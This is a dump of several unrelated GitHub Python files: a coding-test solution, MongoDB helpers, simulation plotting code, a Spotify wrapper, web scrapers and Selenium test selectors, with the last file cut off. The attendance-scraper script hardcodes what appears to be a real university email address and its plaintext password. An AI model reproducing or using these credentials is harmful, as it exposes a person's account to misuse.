하나의 함수에 넣거나 그냥 절차 지향적으로 짜도 되는데, 클래스공부도 할겸 클래스로 짜봤어요.\nflag 쓰는건 약간 제가 좋아하는 기법인데, 이중 for문에서 내부 for문에서 조건에의해 탈출하고 싶을때\n외부 for문 까지 같이 탈출할수 있게 하는 기법이에요. 하지만 쫌 더 깔끔하게 리팩토링 하는 방법이 필요할 것 같아요.\n\n'''\nclass Comparison :\n #출력부\n def __init__(self, lst1, lst2):\n if self.repeat(lst1, lst2):\n print('Yes')\n else:\n print('No')\n\n #연산부\n def repeat (self ,lst1, lst2):\n for num_first_seq in lst1: \n flag = False\n for num_second_seq in lst2:\n if num_first_seq == num_second_seq:\n flag = True\n \n if flag == False:\n return False\n \n return True\n \n\n \nn = int(input())\n\nA = list(map(int,input().split()))\nB = list(map(int,input().split()))\n\nComparison(A,B)","repo_name":"cjm40302537/challenge30-codingtest-study","sub_path":"이영훈-yeonghune/Lv2/TwoIdenticalSequences.py","file_name":"TwoIdenticalSequences.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"20306770466","text":"from src.db.mongoDB.mongo_settings import series_collection\n\n\nasync def insert_document(collection, data):\n return collection.insert_one(data).inserted_id\n\n\nasync def get_document(collection, type_url: str, url: str):\n data = {type_url: url}\n return collection.find_one(data)\n\n\nasync def check_url(type_url: str, url: str):\n res = await get_document(series_collection, type_url, url)\n if not res:\n return False, res\n return True, res\n\n\nasync def save_urls(long_url: str, short_url: str):\n data = {\n \"long_url\": long_url,\n \"short_url\": short_url,\n }\n await insert_document(series_collection, data)\n","repo_name":"RautaruukkiPalich/Pali.ch","sub_path":"src/db/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7110859795","text":"from analysistools.StatisticDataFrame import StatisticDataFrame\nfrom analysistools.PlotBuilder import PlotBuilder\nfrom pprint import pprint\nfrom time import time\nimport configparser as cp\nimport json\n\n\nconfig = cp.ConfigParser()\nconfig.read(\"settings.ini\")\n\n\ndef load_plot_lines(plot_data, statistic_name, statistic_plot):\n color_list = json.loads(config.get(\"Plot_Profile\", \"color_list\"))\n color_index = 0\n x_error_bar = None\n\n for statistic_data in plot_data[statistic_name]:\n if len(statistic_data) > 3:\n x_error_bar = statistic_data[3]\n\n statistic_plot.add_plot_line(statistic_data[0], statistic_data[1], statistic_data[2],\n x_error_bar=x_error_bar, color=color_list[color_index])\n color_index = color_index+1\n\n\ndef plot_statistic(statistic_name, plot_data, plot_profile, x_axis_name=\"\", y_axis_name=\"\"):\n plot = PlotBuilder(plot_profile=plot_profile)\n plot.set_axes_label(x_axis_name, y_axis_name)\n\n load_plot_lines(plot_data=plot_data, statistic_name=statistic_name, statistic_plot=plot)\n\n if config[\"General\"].getboolean(\"save_to_file\"):\n plot.to_image(directory=config[\"General\"][\"export_directory\"], file_name=statistic_name + \"_\" + str(time()), image_format=\"png\")\n\n if config[\"General\"].getboolean(\"draw_plots\"):\n plot.draw()\n\n\ndef plot_histogram(statistic_name, plot_data, x_axis_name=\"\", y_axis_name=\"\"):\n color_list = json.loads(config.get(\"Plot_Profile\", \"color_list\"))\n color_index = 0\n\n for statistic_data in plot_data[statistic_name]:\n plot = PlotBuilder(plot_profile=\"histogram\")\n plot.set_axes_label(x_axis_name, y_axis_name)\n\n plot.add_plot_line(statistic_data[0], statistic_data[1], num_bins=statistic_data[2], color=color_list[color_index])\n color_index = color_index+1\n\n if config[\"General\"].getboolean(\"save_to_file\"):\n plot.to_image(directory=config[\"General\"][\"export_directory\"], file_name=statistic_name + \"_\" + str(time()), image_format=\"png\")\n\n if config[\"General\"].getboolean(\"draw_plots\"):\n plot.draw()\n\n\ndef plot_qq(statistic_name, plot_data, x_axis_name=\"\", y_axis_name=\"\"):\n color_list = json.loads(config.get(\"Plot_Profile\", \"color_list\"))\n color_index = 0\n\n for statistic_data in plot_data[statistic_name]:\n plot = PlotBuilder(plot_profile=\"qq\")\n plot.set_axes_label(x_axis_name, y_axis_name)\n\n plot.add_plot_line(statistic_data[0], statistic_data[1], statistic_data[2], regression_x=statistic_data[3], regression_y=statistic_data[4], color=color_list[color_index])\n color_index = color_index+1\n\n if config[\"General\"].getboolean(\"save_to_file\"):\n plot.to_image(directory=config[\"General\"][\"export_directory\"], file_name=statistic_name + \"_\" + str(time()), image_format=\"png\")\n\n if config[\"General\"].getboolean(\"draw_plots\"):\n plot.draw()\n\n\ndef main():\n cashier_level = json.loads(config.get(\"Analysis\", \"cashier_level\"))\n statistic_list = json.loads(config.get(\"Analysis\", \"statistic_list\"))\n confidence_level = config[\"Analysis\"].getfloat(\"confidence_level\")\n dataframe = StatisticDataFrame(config[\"General\"][\"working_csv\"])\n\n '''************* DATA ANALYSIS *************'''\n start_time = time()\n\n #ECDF_data = dataframe.get_ECDF_data(statistic_list, cashier_level, confidence_level)\n #ECDF_no_error = dataframe.get_ECDF_data(statistic_list, cashier_level, confidence_level=None)\n #Lorenz_data = dataframe.get_Lorenz_Curve_data(statistic_list, cashier_level)\n #histogram_data = dataframe.get_histogram_data(statistic_list, cashier_level, number_bins=200)\n #qq_data = dataframe.get_qq_plot_data(statistic_list, cashier_level, theoretical_distribution=\"weibull\", weibull_shape=0.8)\n #sample_mean = dataframe.get_sample_mean(statistic_list, cashier_level, confidence_level)\n #sample_median = dataframe.get_sample_median(statistic_list, cashier_level, confidence_level)\n #sample_CoV = dataframe.get_sample_coefficient_of_variation(statistic_list, cashier_level)\n\n print(\"Data analysis completed\")\n print(\"--- %s seconds ---\" % (time() - start_time))\n\n '''************* DATA PLOT *************'''\n\n \"\"\"\n pprint(sample_mean)\n pprint(sample_median)\n pprint(sample_CoV)\n \"\"\"\n\n \"\"\"\n plot_statistic(\"waitingTimeVipCustomerCashierQueueStatistic\", ECDF_data, plot_profile=\"ecdf\", x_axis_name=r'$W^{VIP}_{CASHIER} [min]$', y_axis_name=\"Probability\")\n plot_statistic(\"responseTimeVipCustomerCashierNodeStatistic\", ECDF_data, plot_profile=\"ecdf\", x_axis_name=r'$R^{VIP}_{CASHIER} [min]$', y_axis_name=\"Probability\")\n plot_statistic(\"waitingTimeNormalCustomerCashierQueueStatistic\", ECDF_data, plot_profile=\"ecdf\", x_axis_name=r'$W^{NORMAL}_{CASHIER} [min]$', y_axis_name=\"Probability\")\n plot_statistic(\"responseTimeNormalCustomerCashierNodeStatistic\", ECDF_data, plot_profile=\"ecdf\", x_axis_name=r'$R^{NORMAL}_{CASHIER} [min]$', y_axis_name=\"Probability\")\n \"\"\"\n\n \"\"\"\n plot_statistic(\"waitingTimeVipCustomerCashierQueueStatistic\", ECDF_no_error, plot_profile=\"ecdf\", x_axis_name=\"Waiting time VIP customer [s]\", y_axis_name=\"Probability\")\n plot_statistic(\"responseTimeVipCustomerCashierNodeStatistic\", ECDF_no_error, plot_profile=\"ecdf\", x_axis_name=\"Response time VIP customer [s]\", y_axis_name=\"Probability\")\n plot_statistic(\"waitingTimeNormalCustomerCashierQueueStatistic\", ECDF_no_error, plot_profile=\"ecdf\", x_axis_name=\"Waiting time normal customer [s]\", y_axis_name=\"Probability\")\n plot_statistic(\"responseTimeNormalCustomerCashierNodeStatistic\", ECDF_no_error, plot_profile=\"ecdf\", x_axis_name=\"Response time normal customer [s]\", y_axis_name=\"Probability\")\n \"\"\"\n\n \"\"\"\n plot_statistic(\"waitingTimeVipCustomerCashierQueueStatistic\", Lorenz_data, plot_profile=\"lorenz\", x_axis_name=\"Waiting time VIP customer\")\n plot_statistic(\"responseTimeVipCustomerCashierNodeStatistic\", Lorenz_data, plot_profile=\"lorenz\", x_axis_name=\"Response time VIP customer\")\n plot_statistic(\"waitingTimeNormalCustomerCashierQueueStatistic\", Lorenz_data, plot_profile=\"lorenz\", x_axis_name=\"Waiting time normal customer\")\n plot_statistic(\"responseTimeNormalCustomerCashierNodeStatistic\", Lorenz_data, plot_profile=\"lorenz\", x_axis_name=\"Response time normal customer\")\n \"\"\"\n\n \"\"\"\n plot_histogram(\"waitingTimeVipCustomerCashierQueueStatistic\", histogram_data, x_axis_name=\"Waiting time VIP customer [s]\", y_axis_name=\"Frequency\")\n plot_histogram(\"responseTimeVipCustomerCashierNodeStatistic\", histogram_data, x_axis_name=\"Response time VIP customer [s]\", y_axis_name=\"Frequency\")\n plot_histogram(\"waitingTimeNormalCustomerCashierQueueStatistic\", histogram_data, x_axis_name=\"Waiting time normal customer [s]\", y_axis_name=\"Frequency\")\n plot_histogram(\"responseTimeNormalCustomerCashierNodeStatistic\", histogram_data, x_axis_name=\"Response time normal customer [s]\", y_axis_name=\"Frequency\")\n \"\"\"\n\n \"\"\"\n plot_qq(\"waitingTimeVipCustomerCashierQueueStatistic\", qq_data, y_axis_name=r'$W^{VIP}_{CASHIER} [s]', x_axis_name=\"Weibull quantile\")\n plot_qq(\"responseTimeVipCustomerCashierNodeStatistic\", qq_data, y_axis_name=r'$R^{VIP}_{CASHIER} [s]$', x_axis_name=\"Weibull quantile (k = 1.15)\")\n plot_qq(\"waitingTimeNormalCustomerCashierQueueStatistic\", qq_data, y_axis_name=r'$W^{NORMAL}_{CASHIER} [s]', x_axis_name=\"Weibull quantile\")\n plot_qq(\"responseTimeNormalCustomerCashierNodeStatistic\", qq_data, y_axis_name=r'$R^{NORMAL}_{CASHIER} [s]$', x_axis_name=\"Weibull quantile (k = 0.95)\")\n \"\"\"\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"diegocasu/FacultyBar","sub_path":"DataAnalysis/WaitingResponseTimes/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69965542509","text":"#!/usr/bin/python\n# coding: utf-8\n\nfrom pprint import pprint\nfrom pylab import *\nfrom collections import defaultdict\n\nfrom collections import deque\n\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n\n# TODO: setting/write_drawを追加してぐちゃぐちゃになったから, 一回整理する.\n\nclass Plotter(object):\n\n def __init__(self):\n self.graphs = []\n self.xdata = defaultdict(lambda: defaultdict(list))\n self.ydata = defaultdict(lambda: defaultdict(list))\n self.initialized = False\n self.plots = defaultdict(lambda: defaultdict(list))\n\n self.settings = None\n\n def write(self, title, y_value, x_value=None):\n \"\"\"\n for non-movable\n\n y_values = {'plus':1, 'minus': 1}\n x_values = {'plus':1, 'minus': 1}\n \"\"\"\n for key, value in y_value.items():\n self.ydata[title][key].append(value)\n\n if x_value is not None:\n for key, value in x_value.items():\n self.xdata[title][key].append(value)\n else:\n for key, value in y_value.items():\n self.xdata[title][key].append(len(self.xdata[title][key]))\n\n def reset(self):\n self.graphs = []\n self.plots = defaultdict(lambda: defaultdict(list))\n self.xdata = defaultdict(lambda: defaultdict(list))\n self.ydata = defaultdict(lambda: defaultdict(list))\n self.initialize(self.settings, self.movable)\n\n def add(self, title, y_values, x_values=None):\n \"\"\"\n for non-movable\n\n y_values = {'plus':[1, 2, 3, ..], 'minus': [1, 2, 3, ...]}\n x_values = {'plus':[1, 2, 3, ..], 'minus': [1, 2, 3, ...]}\n \"\"\"\n self.ydata[title].update(y_values)\n if x_values is not None:\n self.xdata[title].update(x_values)\n else:\n self.xdata[title].update(dict([(subt, range(len(values))) for subt,values in y_values.items()]))\n\n\n def show(self, save_dir=None, file_name=None):\n \"\"\"\n for non-movable\n\n if save_dir and file_name is not None,\n this method save image and do not show.\n \"\"\"\n\n if self.movable:\n plt.ioff()\n plt.show()\n return\n\n for idx, title in enumerate(self.settings.keys()):\n for sub_title in self.settings[title]['sub_title']:\n self.plots[title][sub_title].set_xdata(self.xdata[title][sub_title])\n self.plots[title][sub_title].set_ydata(self.ydata[title][sub_title])\n\n self.graphs[idx].legend(tuple(self.settings[title]['sub_title']), loc=3)\n self.graphs[idx].relim()\n self.graphs[idx].autoscale_view(True, True, True)\n\n if save_dir is not None and file_name is not None:\n plt.savefig(save_dir + file_name)\n else:\n plt.show()\n\n\n\n def initialize(self, settings, movable=False):\n self.settings = settings\n self.movable = movable\n\n self.fig = plt.figure(figsize=(16, 10))\n gs = gridspec.GridSpec(len(settings), 1)\n\n\n WINDOW = 100\n if movable:\n plt.ion()\n\n # graph setting\n for idx, title in enumerate(settings.keys()):\n self.graphs.append(self.fig.add_subplot(gs[idx, 0]))\n if settings[title].has_key('ylim'):\n plt.ylim( settings[title]['ylim'] )\n plt.title( title )\n\n for idx, title in enumerate(settings.keys()):\n for sub_title in settings[title]['sub_title']:\n if movable:\n self.xdata[title][sub_title] = deque([0.0] * WINDOW, maxlen=WINDOW)\n self.ydata[title][sub_title] = deque([0.0] * WINDOW, maxlen=WINDOW)\n\n self.plots[title][sub_title], = self.graphs[idx].plot(self.xdata[title][sub_title], self.ydata[title][sub_title])\n self.graphs[idx].legend(tuple(settings[title]['sub_title']), loc=3)\n\n plt.tight_layout()\n self.initialized = True\n\n def write_draw(self, title, y_value, x_value=None):\n \"\"\"\n for movable\n\n y_values = {'plus':1, 'minus': 1}\n x_values = {'plus':1, 'minus': 1}\n \"\"\"\n\n\n for key, value in y_value.items():\n self.ydata[title][key].append(value)\n\n\n if x_value is not None:\n for key, value in x_value.items():\n self.xdata[title][key].append(value)\n else:\n self.xdata[title][key].append(len(self.xdata[title][key]))\n\n\n # update\n for idx, title in enumerate(self.settings.keys()):\n for sub_title in self.settings[title]['sub_title']:\n self.plots[title][sub_title].set_xdata(self.xdata[title][sub_title])\n self.plots[title][sub_title].set_ydata(self.ydata[title][sub_title])\n\n self.graphs[idx].legend(tuple(self.settings[title]['sub_title']), loc=3)\n self.graphs[idx].relim()\n self.graphs[idx].autoscale_view(True, True, True)\n\n plt.draw()\n return plt\n\n\n","repo_name":"kokukuma/nupic_function_recognition","sub_path":"lib/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"73722628266","text":"import spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nimport os\nimport json\nfrom urllib.request import urlretrieve\n\n\nclass Spotify:\n def __init__(self):\n os.environ['SPOTIPY_CLIENT_ID'] = ''\n os.environ['SPOTIPY_CLIENT_SECRET'] = ''\n os.environ['SPOTIPY_REDIRECT_URI'] = 'http://localhost:8888/callback'\n \n self.scope = \"user-library-read user-top-read user-read-currently-playing user-follow-read\"\n\n def login(self):\n self.sp = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=self.scope))\n print(\"Connected as\", self.sp.current_user()['display_name'])\n\n def current_info(self):\n if type(self.sp.currently_playing()) is not None:\n songName = self.sp.currently_playing()['item']['name']\n artistName = self.sp.currently_playing()['item']['artists'][0]['name']\n result = self.sp.currently_playing()['item']['id']\n features = self.sp.audio_analysis(result)\n # result = self.sp.currently_playing()\n # return json.dumps(features, indent=4)\n track = features['track']\n informations = {'tempo': track['tempo'],\n 'name': songName,\n 'artist': artistName,\n 'key': track['key'],\n 'mode': track['mode'],\n 'cover_url': self.sp.currently_playing()['item']['album']['images'][0]['url']}\n\n return informations\n else:\n return \"ERROR: App could not find any songs playing right now. Please open a song and try again.\"\n\n\n def _load_json(self, json_file):\n with open(json_file) as file:\n tonal_information = json.load(file)\n\n return tonal_information\n\n def currentSong(self, json_file):\n tonal_information = self._load_json(json_file)\n song_information = self.current_info()\n\n informations = {'song': song_information['name'],\n 'artist': song_information['artist'],\n 'tempo': song_information['tempo'],\n 'key': tonal_information['pitchClass'][str(song_information['key'])],\n 'mode': tonal_information['mode'][str(song_information['mode'])],\n 'cover_url': song_information['cover_url']}\n\n return informations\n\n def download_cover(self, url):\n urlretrieve(url, \"static/cover.png\")\n","repo_name":"eren-darici/spotify-keyfinder","sub_path":"SpotifyAPIManager.py","file_name":"SpotifyAPIManager.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74286628586","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nimport pymongo\n\nclient=pymongo.MongoClient('localhost',27017)\nsecond=client['xiao_zhu']\nhz=second['hz']\n\ndef get_page_info(url):\n web_data=requests.get(url)\n time.sleep(2)\n soup=BeautifulSoup(web_data.text,'lxml')\n titles=soup.select('div.list > ul > li > div > p.infoBox > a')\n images=soup.select('div.list > ul > li > div > a > img')\n prices=soup.select('div.list > ul > li > div > p.priType-s > span > i')\n for title,image,price in zip(titles,images,prices):\n info={\n 'title':title.get_text(),\n 'image':image.get('src'),\n 'price':price.get_text().replace(u'万', '').replace(' ', '')\n }\n hz.insert_one(info)\n print(info)\ndef get_totalPage_info():\n urls=[\"https://www.guazi.com/cd/buy/o{}/\".format(str(i)) for i in range(1,382,1)]\n for url in urls:\n get_page_info(url)\nif __name__ == '__main__':\n get_totalPage_info()","repo_name":"charlene93/Python","sub_path":"spider01/Second-handCar.py","file_name":"Second-handCar.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24916820000","text":"import time\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom bs4 import BeautifulSoup\nimport smtplib\nfrom email.message import EmailMessage\nfrom datetime import datetime\n\nprint(\"Starting Automated Testing\")\nusername = input(\"Enter The Username Of Knowledge Pro\\n\")\npassword = input(\"Enter The Password Of Knowledge Pro\\n\")\nrecipient = input(\"Enter Email To Send Alerts\\n\")\ndriver = webdriver.Chrome(ChromeDriverManager().install())\n#Automated Selenium Testing\ndriver.get('http://www.google.com/')\nsearch_box = driver.find_element_by_name('q')\nsearch_box.send_keys('Presidency Knowledge Pro')\nsearch_box.submit()\nknowledgepro = driver.find_element_by_xpath('//*[@id=\"rso\"]/div[1]/div/div[1]/a/h3/span')\nknowledgepro.click()\ntime.sleep(3)\nusernameinput = driver.find_element_by_id('username')\npasswordinput = driver.find_element_by_id('password')\nusernameinput.send_keys(username)\npasswordinput.send_keys(password)\nlogin = driver.find_element_by_id(\"Login\")\nlogin.click()\nprint(\"Successfully Logged Into Knowledge Pro\\n\")\nsidebar = driver.find_element_by_id(\"sidebar_main_toggle\")\nsidebar.click()\nattendancePage = driver.find_element_by_xpath('//*[@id=\"sidebar_main\"]/div/div[1]/div[2]/ul/li[1]/a')\nattendancePage.click()\npage_source = driver.page_source\ndriver.quit()\n# BEAUTIFUL SOUP Extraction\nsoup = BeautifulSoup(page_source, features='lxml')\ndata = []\ntable = soup.find(\"table\")\ntable_body = table.find(\"tbody\")\nrows = table_body.findAll(\"tr\")\nfor row in rows:\n cols = row.findAll(\"td\")\n cols = [ele.text.strip() for ele in cols]\n data.append([ele for ele in cols if ele])\nprint(\"Uncleaned Data received\")\nprint(\"Data : \")\nprint(data)\nprint(\"\\n\")\ntime.sleep(3)\ndataClean1 = list(filter(None, data)) # Remove Empty List\ndataClean2 = dataClean1[2:-3] # Remove First Unnecessary and Last Unnecessary Row\nlessAttendance = {}\nborderAttendance = {}\ngoodAttendance = {}\nprint(\"\\nData Cleaned Successfully\\n\")\ntime.sleep(2)\nfor subject in dataClean2:\n try:\n first = int(subject[0])\n temp = float(subject[-1])\n if temp < 75:\n print(\"Low Attendance In \" + subject[1])\n lessAttendance[subject[1]] = temp\n elif 85 > temp > 75:\n print(\"BorderLine Attendance In \" + subject[1])\n borderAttendance[subject[1]] = temp\n else:\n print(\"Good Attendance In \" + subject[1])\n goodAttendance[subject[1]] = temp\n except ValueError:\n continue\n\nleastString = \"\"\nfor subject, marks in lessAttendance.items():\n temp = str(subject) + \" : \" + str(marks)\n leastString = leastString + \"\\n\" + temp\nborderString = \"\"\nfor subject, marks in borderAttendance.items():\n temp = str(subject) + \" : \" + str(marks)\n borderString = borderString + \"\\n\" + temp\ngoodString = \"\"\nfor subject, marks in goodAttendance.items():\n temp = str(subject) + \" : \" + str(marks)\n goodString = goodString + temp\nprint(\"\\nLow Attendance And Border Attendance Subjects Obtained\\n\")\ntime.sleep(2)\nemail = \"201810100741@presidencyuniversity.in\"\npassword = \"Uzair2005\"\nprint(\"Initiating Email Process\")\ntime.sleep(2)\n# Initiating Email\nsmtpObj = smtplib.SMTP('smtp.gmail.com', 587)\nsmtpObj.ehlo()\nsmtpObj.starttls()\nprint(\"Email Id Setup Complete\")\nmsg = EmailMessage()\nmsg.set_content(\"The Following Courses Have VERY LOW ATTENDANCE : %s\\n\\nThese Courses Are In The Border Line : %s \" % (\n leastString, borderString))\nnow = datetime.now()\ncurrent_time = now.strftime(\"%H:%M:%S\")\nmsg['Subject'] = 'Attendance Alerts Auto Generated [%s]' % current_time\nmsg['From'] = email\nmsg['To'] = recipient\nsmtpObj.login(email, password)\n# Sending Email To User\nsmtpObj.send_message(msg)\nprint(\"\\n\\nEmail Sent To User : %s\\n\" % recipient)\nsmtpObj.quit()\n# End Of Program\n","repo_name":"umairrsyedd/Attendance-Scrape-Email","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36759708990","text":"import unittest\ndef Sum(arg):\n Total =0\n for x in arg:\n Total+=x\n\nclass Test_sum(unittest.TestCase):\n def test_sum(self):\n data = [1,3,3]\n res = sum(data)\n self.assertEqual(res, 6)\n \n\n \n\nif __name__ == \"__main__\":\n unittest.main()\n\n","repo_name":"kaizokouabhijit/Python","sub_path":"Testing_In_Python/Test_sum.py","file_name":"Test_sum.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69937962989","text":"from generators import *\nfrom controllers import *\nfrom applications import Application1\nfrom monitoring import Monitoring\nfrom simulationlist import SimulationWithDependeciesList\n\nstime = 0.2\nappSLA = stime * 3\nhorizon = 2000\nmonitoringWindow = 10\ninitCores = 100\nperiod = 1\n\nc0 = CTControllerScaleX(period, initCores); c0.setName(\"ScaleX\")\nc1 = CTControllerScaleX(period, initCores); c1.setName(\"ScaleX\")\nc2 = CTControllerScaleX(period, initCores); c2.setName(\"ScaleX\")\nc3 = CTControllerScaleX(period, initCores); c3.setName(\"ScaleX\")\nc4 = CTControllerScaleX(period, initCores); c4.setName(\"ScaleX\")\n\n\napps = [Application1(appSLA, init_cores=initCores), Application1(appSLA, init_cores=initCores), Application1(appSLA, init_cores=initCores), Application1(appSLA, init_cores=initCores), Application1(appSLA, init_cores=initCores)]\ncts = [c0, c1, c2,c3,c4] # a controller for each App\nmns = [Monitoring(monitoringWindow, appSLA), Monitoring(monitoringWindow, appSLA), Monitoring(monitoringWindow, appSLA), Monitoring(monitoringWindow, appSLA), Monitoring(monitoringWindow, appSLA)]\n\nc0.setSLA(apps[0].sla); c1.setSLA(apps[1].sla); c2.setSLA(apps[2].sla); c3.setSLA(apps[3].sla); c4.setSLA(apps[4].sla)\nc0.setMonitoring(mns[0]); c1.setMonitoring(mns[1]); c2.setMonitoring(mns[2]); c3.setMonitoring(mns[3]); c4.setMonitoring(mns[4])\n\n\ng0 = SinGen(500, 700, 200); g0.setName(\"SN1 - App 1\") # a generator for each App\ng1 = RampGen(10, 800); g1.setName(\"RP1 - App 2\")\ng2 = SinGen(500, 700, 200); g2.setName(\"SN1 - App 2\")\ng3 = RampGen(10, 800); g3.setName(\"RP1 - App 3\")\ng4 = SinGen(500, 700, 200); g4.setName(\"SN1 - App 4\")\n\nc0.setGenerator(g0); c1.setGenerator(g1); c2.setGenerator(g2); c3.setGenerator(g3); c4.setGenerator(g4)\n\ngens = [g0, g1, g2, g3, g4] # set to each App\n\nsimul = SimulationWithDependeciesList(horizon, apps, gens, mns, cts)\nsimul.run()\nsimul.plot()","repo_name":"iticongolo/resourceAllocationSimulators","sub_path":"main-list.py","file_name":"main-list.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"784098227","text":"from typing import Any\n\nimport pytest\n\nfrom lsst.cm.tools.core.checker import Checker\nfrom lsst.cm.tools.core.handler import Handler\n\n\ndef test_bad_checker() -> None:\n class BadChecker(Checker):\n pass\n\n with pytest.raises(TypeError):\n Checker.get_checker(\"lsst.cm.tools.core\")\n\n\ndef test_bad_handler() -> None:\n class BadHandler(Handler):\n @classmethod\n def bad_get_kwarg(cls) -> Any:\n return cls.get_kwarg_value(\"bad\")\n\n def bad_resolve_templated(self) -> None:\n self.config[\"bad_template\"] = \"{missing}\"\n self.resolve_templated_string(\"bad_template\")\n\n with pytest.raises(TypeError):\n Handler.get_handler(-1, \"lsst.cm.tools.core.handler\")\n\n with pytest.raises(KeyError):\n BadHandler.bad_get_kwarg()\n\n\nif __name__ == \"__main__\":\n test_bad_handler()\n","repo_name":"lsst-dm/cm_tools","sub_path":"tests/test_bad_classes.py","file_name":"test_bad_classes.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40748053634","text":"\nimport unittest\nfrom player import Player\nfrom cardGame import CardGame\n\nclass TestPlayerDrawCard(unittest.TestCase):\n\n def testDrawCardFromEmptyDrawPile(self):\n \"\"\" If a player with an empty draw pile tries to draw a card, the discard pile is shuffled into the draw pile.\"\"\"\n testPlayer = Player('test')\n testPlayer.addCardToDiscardPile(10)\n testPlayer.addCardToDiscardPile(7)\n testPlayer.addCardToDiscardPile(8)\n testPlayer.addCardToDiscardPile(3)\n \n testPlayer.drawCard()\n \n self.assertEqual(3, len(testPlayer.getDrawPile()))\n \n def testHigherCardShouldWin(self):\n \"\"\" When comparing two cards, the higher card should win.\"\"\"\n player1 = Player(\"Player 1\");\n player2 = Player(\"Player 2\");\n\n player1.addToDrawPile(1);\n player1.addToDrawPile(2);\n player1.addToDrawPile(3);\n\n player2.addToDrawPile(4);\n player2.addToDrawPile(5);\n player2.addToDrawPile(6);\n\n game = CardGame()\n game.play(player1,player2);\n\n self.assertTrue(player2.getNumberOfCards() > player1.getNumberOfCards());\n \n def testEqualCards(self):\n \"\"\"When comparing two cards of the same value, the winner of the next round should win 4 cards.\"\"\"\n \n player1 = Player(\"Player 1\");\n player2 = Player(\"Player 2\");\n \n player1.addToDrawPile(1);\n player1.addToDrawPile(2);\n player1.addToDrawPile(3);\n\n player2.addToDrawPile(1);\n player2.addToDrawPile(6);\n player2.addToDrawPile(6);\n\n game = CardGame()\n game.play(player1,player2);\n game.play(player1,player2);\n\n self.assertTrue(player2.getNumberOfCards() - player1.getNumberOfCards() == 4);\n\n","repo_name":"SpoiL3r/card-game","sub_path":"src/lib/cardGameTest.py","file_name":"cardGameTest.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24173357498","text":"import random\nimport time\nimport re\nimport urlparse\nfrom behave import *\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nSIDEBAR_GROUPS_LINK = '[href=\"/dashboard/groups\"]'\nSIDEBAR_APPROVALS = '[href=\"/dashboard/approvals\"]'\nGROUPS_HEADER_ELEMENT = '.panel-heading h1'\nGROUP_FILTER = '[class=\"form-control ng-isolate-scope\"]' # First tools is fixed dummy.\nCREATE_NEW_GROUP_BUTTON = \"\"\"[ng-click=\"addGroup()\"]>i\"\"\"\nTABLE_FIRST_ROW = '#content .panel-body table tbody tr td:first-child'\nGROUP_FORM = 'form[name=\"groupForm\"]'\nGROUP_NAME_INPUT = '#id_group_name'\nCOUNTRY_DROPDOWN = '[name=\"country\"] .btn'\nFIRST_OPTION = '.ui-select-choices-row'\nGROUP_TYPE_DROPDOWN = '[name=\"type\"] .btn'\n#MODAL_LOGIN_SUBMIT_BUTTON = '.modal-footer .btn-primary:not([disabled])'\nMODAL_LOGIN_SUBMIT_BUTTON = \"\"\".modal-footer [type=\"submit\"]\"\"\"\nEDIT_GROUP_BUTTON = '[ng-click=\"editGroup()\"]>i'\nMODAL_EDIT_GROUP_WINDOW = \"h3.modal-title.ng-binding\"\nPERMISSIONS_CELL = '[ng-controller=\"GroupLicenseTypeCtrl\"] td + td'\nTABLE_HEADER_SORT_BY_ID = 'thead + thead [st-sort=\"Id\"]'\nNEW_USER_BUTTON_TOOLBAR = \"\"\"[ng-click=\"actions.addUser()\"]\"\"\"\nFIRST_NAME_FIELD = '#id_first_name'\nLAST_NAME_FIELD = '#id_last_name'\nEMAIL_FIELD = '#id_email'\nUSER_SUCCESS_MESSAGE = '.gritter-success'\nUSER_TABLE_ROW = '[ng-repeat=\"user in filteredUsers\"]'\nGENERIC_MODAL = '.modal'\nCONFIRM_BUTTON = '.modal [ng-click=\"yes()\"]'\nLOADER = \"\"\".spinner\"\"\"\nCREATION_TOOLS_CHECKBOXES = \"\"\"[class=\"checkbox ng-scope\"]\"\"\"\nMORE_OPTIONS_BTN = \"\"\".dropdown-toggle[tooltip=\"More options\"]\"\"\"\nMORE_OPTIONS = '.dropdown.open>ul.dropdown-menu.dropdown-menu-right'\nGROUPS_TABLE = \"\"\"tr[ng-repeat=\"group in filteredGroups\"]\"\"\"\nUSERS_ROLES = \"\"\"a.ng-binding\"\"\"\nAPPLIED_ROLES = \"\"\"[ng-repeat=\"role in user.Roles track by $index\"]\"\"\"\nDROPDOWN_SUBMIT = \"\"\".btn.btn-primary\"\"\"\nBLIPP_APPROVE_CHECKBOX = '[class=\"ng-scope ng-binding\"]'\nUSER_DROPDOWN = 